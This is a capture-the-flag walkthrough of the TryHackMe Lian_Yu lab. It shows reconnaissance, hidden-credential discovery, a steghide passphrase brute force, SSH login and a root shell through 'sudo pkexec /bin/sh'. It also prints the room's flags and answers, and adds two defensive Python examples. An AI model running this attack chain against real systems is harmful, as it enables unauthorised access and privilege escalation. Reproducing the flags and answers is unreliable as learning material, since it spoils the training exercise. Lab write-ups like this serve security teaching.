TryHackMe - Lian_Yu - Writeup

A beginner level security challenge

Nmap scan

root@ip-10-10-187-225:~# nmap -sCV -A 10.10.87.122

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-17 18:18 BST
Nmap scan report for ip-10-10-87-122.eu-west-1.compute.internal (10.10.87.122)
Host is up (0.00077s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.2
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
|   2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
|   256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_  256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (EdDSA)
80/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          43649/udp  status
|_  100024  1          45593/tcp  status
MAC Address: 02:3A:57:44:F8:BD (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms ip-10-10-87-122.eu-west-1.compute.internal (10.10.87.122)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds

Directory fuzzing

root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.87.122
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,cgi,css,js,py,conf,php,sh,html
[+] Timeout:        10s
===============================================================
2021/06/17 18:27:20 Starting gobuster
===============================================================
/index.html (Status: 200)
/island (Status: 301)
/server-status (Status: 403)
Progress: 194700 / 220561 (88.27%)

Nothing else of interest turned up at the web root, so I fuzzed inside the /island directory next.

root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.87.122/island
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     cgi,css,js,py,conf,php,sh,txt,html
[+] Timeout:        10s
===============================================================
2021/06/17 18:59:14 Starting gobuster
===============================================================
/index.html (Status: 200)
/2100 (Status: 301)
<!DOCTYPE html>
<html>
<body>
<style>
 
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>


<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->


<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>

</body>
</html>

The hidden text on http://10.10.87.122/island (white text on a white background) is vigilante. Viewing the source of /island/2100/ I found a hint about a file extension, .ticket:

<!DOCTYPE html>
<html>
<body>

<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>


<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how?   -->

</header>
</body>
</html>

Add the .ticket extension to the gobuster extension list:

root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf,ticket
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.87.122/island/2100
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,py,sh,txt,cgi,conf,ticket,php,css,js
[+] Timeout:        10s
===============================================================
2021/06/17 19:10:55 Starting gobuster
===============================================================
/index.html (Status: 200)
/green_arrow.ticket (Status: 200)

Download the file green_arrow.ticket; its contents are:


This is just a token to get into Queen's Gambit(Ship)


RTy8yhBQdscX

The token is Base58; decode it (I used CyberChef) to get the password.

  • what is the FTP Password?

Answer: !#th3h00d
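To show what CyberChef is doing with that token, here is an added example (not part of the original writeup): a small Base58 decoder with the Bitcoin alphabet, plus a triage check that tells Base58 apart from Base64 by its alphabet (no 0, O, I, l, +, / or =). The encoder is included only to round-trip and sanity-check the decoder; the function and constant names are my own.

```python
# Added example, not from the original writeup: decode the Base58 token
# found in green_arrow.ticket and verify the FTP password it yields.
# Base58 (Bitcoin alphabet) omits 0, O, I and l to avoid visual confusion,
# which is also the fastest way to distinguish it from Base64: valid Base58
# never contains '0', 'O', 'I', 'l', '+', '/' or '='.
BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_B58_INDEX = {c: i for i, c in enumerate(BASE58_ALPHABET)}


def looks_like_base58(s: str) -> bool:
    """Cheap triage: non-empty and every character is in the Base58 alphabet."""
    return bool(s) and all(c in _B58_INDEX for c in s)


def b58decode(s: str) -> bytes:
    """Decode a Base58 string into bytes.

    Each leading '1' encodes a literal 0x00 byte; the rest of the string is
    one big base-58 integer that becomes big-endian bytes.
    """
    if not looks_like_base58(s):
        raise ValueError("not a Base58 string (character outside the alphabet)")
    n = 0
    for ch in s:
        n = n * 58 + _B58_INDEX[ch]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(s) - len(s.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode; used here to round-trip and check the decoder."""
    n = int.from_bytes(data, "big")
    digits = []
    while n:
        n, rem = divmod(n, 58)
        digits.append(BASE58_ALPHABET[rem])
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + "".join(reversed(digits))


# The token exactly as it appears in green_arrow.ticket in the writeup.
TICKET_TOKEN = "RTy8yhBQdscX"


def decode_ticket(token: str = TICKET_TOKEN) -> str:
    """Decode the ticket token and return it as text (the FTP password)."""
    return b58decode(token).decode("ascii")


if __name__ == "__main__":
    print("looks like Base58:", looks_like_base58(TICKET_TOKEN))
    print("decoded password:", decode_ticket())
```

The leading-'1' rule matters in general Base58 use (it is how Bitcoin addresses keep their version byte), but for this token there are no leading ones, so the whole string is just one big integer converted to nine ASCII bytes.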

Use the hidden text from http://10.10.87.122/island, vigilante, as the FTP username, with the password we just decoded.

root@ip-10-10-187-225:~# ftp 10.10.87.122
Connected to 10.10.87.122.
220 (vsFTPd 3.0.2)
Name (10.10.87.122:root): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png
-rw-r--r--    1 0        0          549924 May 05  2020 Queen's_Gambit.png
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx------    2 1000     1000         4096 May 01  2020 slade
drwxr-xr-x    2 1001     1001         4096 May 05  2020 vigilante
226 Directory send OK.

Get all the image files; note there is also another user, slade. Two of the three images are fine, but Leave_me_alone.png is broken. Running strings on it found nothing but random text. Next one is aa.jpg:

root@ip-10-10-187-225:~# steghide extract -sf aa.jpg
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Interesting. Let's use stegcracker to brute-force the passphrase.

root@ip-10-10-187-225:~# stegcracker aa.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'aa.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: password
Tried 4 passwords
Your file has been written to: aa.jpg.out
password

root@ip-10-10-187-225:~# steghide extract -sf aa.jpg
Enter passphrase: 
wrote extracted data to "ss.zip".

Extract ss.zip:

root@ip-10-10-68-68:~# unzip ss.zip
Archive:  ss.zip
  inflating: passwd.txt              
  inflating: shado 
root@ip-10-10-68-68:~# cat shado
M3tahuman

This could be the SSH password.

  • what is the file name with SSH password?

Answer: shado

I tried to log in over SSH with the FTP username, but that password didn't work. The other user is slade, so I used that username with the SSH password, and it worked.

root@ip-10-10-68-68:~# ssh slade@10.10.87.122
slade@10.10.87.122's password: 
			      Way To SSH...
			  Loading.........Done.. 
		   Connecting To Lian_Yu  Happy Hacking

slade@LianYu:~$ ls
user.txt
slade@LianYu:~$ cat user.txt
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
			--Felicity Smoak
  • user.txt

Answer: THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}

slade@LianYu:~$ sudo -l
[sudo] password for slade: 
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ 

User slade can run /usr/bin/pkexec as root. Head over to the GTFOBins entry for pkexec.
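The sudo -l output above is exactly what an administrator should be auditing before an attacker reads it. Here is an added example (not part of the original writeup) that parses sudo -l output and flags rules granting root a shell-capable binary or ALL. The sample text is the slade output from this writeup plus one constructed systemctl rule for contrast; the SHELL_CAPABLE list is a small hand-picked subset of what GTFOBins documents, and all function names are my own.

```python
# Added example, not from the original writeup: audit `sudo -l` output for
# rules that effectively hand out a root shell.
import re

# Constructed sample: the `sudo -l` output for slade from the writeup, plus
# one extra rule (systemctl restart nginx) added here for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
"""

# Assumption: a small subset of binaries that GTFOBins documents as able to
# spawn a shell when run under sudo. A real audit should use the full list.
SHELL_CAPABLE = {"pkexec", "sh", "bash", "dash", "zsh", "env", "python",
                 "python3", "perl", "vim", "vi", "less", "more", "find",
                 "awk", "nmap"}

# One sudo rule line: "(runas) TAG: TAG: command args"
_ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from the 'may run' section of sudo -l."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = _ENTRY_RE.match(line)
        if m:
            runas = m.group(1)
            tags = m.group(2).replace(":", " ").split()   # e.g. ["NOPASSWD"]
            entries.append((runas, tags, m.group(3)))
    return entries


def risky_entries(entries):
    """Flag rules that run ALL, or a shell-capable binary, as root."""
    findings = []
    for runas, tags, cmd in entries:
        runas_user = runas.split(":")[0].strip()     # "(root)" or "(ALL : ALL)"
        if runas_user not in ("root", "ALL"):
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]   # /usr/bin/pkexec -> pkexec
        if cmd.strip() == "ALL" or binary in SHELL_CAPABLE:
            findings.append((cmd, "NOPASSWD" in tags))
    return findings


def audit(text):
    """Convenience wrapper: parse then flag, returning [(command, nopasswd)]."""
    return risky_entries(parse_sudo_l(text))


if __name__ == "__main__":
    for cmd, nopasswd in audit(SAMPLE_SUDO_L):
        print(f"ROOT SHELL RISK: {cmd}" + (" (no password needed)" if nopasswd else ""))
```

The point the writeup makes is that pkexec does not need a known exploit here: sudo already runs it as root, and pkexec will happily launch /bin/sh. The audit flags that rule and leaves the narrowly scoped systemctl rule alone.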

slade@LianYu:~$ sudo pkexec /bin/sh
# whoami
root
# cat /root/root.txt
                          Mission accomplished



You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE. 



THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}
									      --DEATHSTROKE

Let me know your comments about this machine :)
I will be available on Twitter: @User6825

Room link: Lian_Yu

Written on June 17, 2021